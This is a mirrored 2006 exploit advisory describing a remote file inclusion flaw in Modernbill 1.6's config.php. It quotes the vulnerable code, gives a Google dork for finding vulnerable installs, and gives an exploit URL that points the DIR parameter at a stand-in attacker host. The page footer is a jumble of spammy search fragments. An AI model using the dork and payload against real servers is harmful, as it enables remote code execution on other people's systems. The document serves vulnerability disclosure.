about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Modernbill <= 1.6 (config.php) Remote File Include Vulnerability




2006-08-07 Modernbill <= 1.6 (config.php) Remote File Include Vulnerability
Rated as : High Risk

#############################SolpotCrew
Community################################
#
# modernbill ver 1.6 (DIR) Remote File Inclusion
#
# Download file : http://freshmeat.net/projects/modernbill/
#
#################################################################################
#
#
# Bug Found By :Solpot a.k.a (k. Hasibuan) (03-08-2006)
#
# contact: chris_hasibuan@yahoo.com
#
# Website : http://www.solpotcrew.org/adv/solpot-adv-04.txt
#
################################################################################
#
#
# Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja ,
# L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy
# home_edition2001 , Rendy ,Tje , m3lky , no-profile , bYu
# and all crew #mardongan @ irc.dal.net
#
#
###############################################################################
Input passed to the "DIR" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from include/html/config.php

//include($DIR."include/misc/mod_sessions/session_functions.inc.php");
#session_set_save_handler("sess_mysql_open","","sess_mysql_read","sess_mysql_write","sess_mysql_destroy","sess_mysql_gc");
//session_start();
session_register("set_language");
session_register("v");
$new_language = ($set_language) ? $set_language : NULL ;
$signup_form = TRUE;
include_once($DIR."include/functions.inc.php");
## ------------------------------------------------------
## DO NOT CHANGE STOP
## ------------------------------------------------------

google dork : allinurl:/modernbill/

exploit:
http://somehost/modernbill/include/html/config.php?DIR=http://evilcode

##############################MY LOVE JUST FOR U
RIE#########################
######################################E.O.F##################################
securitydot.net - 2006-08-07

Advertising

Copyright 2007, SecurityDot
Sun, 29 Nov 2009 21:19:21 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
pub 200 /compo Seseygrils Www indian mambo Remo www.jindia Hot sexye Sania mirz news for c www.bigtit www.918718 news for c Lotus Domi mambo Remo mambo Remo myppxx.cn lo312l mambo Remo movies on body build news for c mambo Remo lo436l mambo Remo APACHE 2.0 radiosajka Vulnerabi www.21succ My Little netcat/htm www sex @ reed www.6qvod. sekyvideo race condi girlsexy Www.FreePo news for c nepedsex sex v ideo snow Sex indone all cartoo net cafe c Enrique ig www+brazze shania twa PHP remote smart movi Vulnerabil